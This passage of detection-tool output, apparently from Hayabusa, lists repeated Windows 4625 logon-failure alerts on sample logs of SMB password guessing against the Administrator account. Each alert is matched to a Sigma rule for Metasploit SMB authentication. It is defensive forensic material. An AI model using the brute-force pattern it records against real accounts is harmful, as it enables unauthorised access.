SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cpjS1YZy2sSRqzI3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EKeate89Gw1oEp0U : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tBhApsBYa65Hxr0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ITv5RS3WHhWe0Hez : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WASvcAp9zfU3uSka : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H1f6szOactEp5ntF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Loe5RkT9Ki0Aw2Lv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJdVtE7dNSoyM3LI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlAtU1mIO7m5DnuP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wAK2rh94yKwiH2Nw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AuqsvmUbPlpWFBRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BShEB6VnXkOxwtFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AjAc5QMvpTBsDziO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Fwwp5CD20dR8QrIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tL6GzVzndZL7DZMN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zK5IpESvDA2DexwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qvTyabCyGaxscOrN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW8VghddPwP5C6dO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xGZuyZ0LErZ3Sgty : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bT1xrvfndr5R8Vg3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H6RFTZVJE9remzqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pzjwzORvTwuBPLEs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UMjSFfZ88BV2sT1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: SnpCLI2EJZRhr3vz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ztEU2m9SwbqgSdVY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHO1X0zwmoWotcM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ck429g2Cs4siVVq4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9txH9zA3oY885iTi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: alIIEzE2rTrNtOtr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ww4BXLwhaNxOttgo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GPdz2pjDocMWqctT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOm1i2a20IDNmIu4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ukSrSu516dHlHQ94 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: grdERCipFl1FMB1o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmpuUsIRbp57KCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VWLuqrOQSQuqcwUr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eEASOf84AX8ow4vf : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IcgNTGlESh6FytEY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OeVo7D3oBsdUMHfj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mLqSB2yGMksaBgUS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y7qRzzpL2YhfIGSD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvE5tMw3MjDhA0Fe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aXuNgOkIzvKIuJki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: q8vPHEXrxVpUyKZq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vk7sh6VM7AZQv2in : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jurt5hAg90y1VWdT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlrPbTbJRTxFakiv : IP Address: 192.168.198.149 : AuthPackage: 
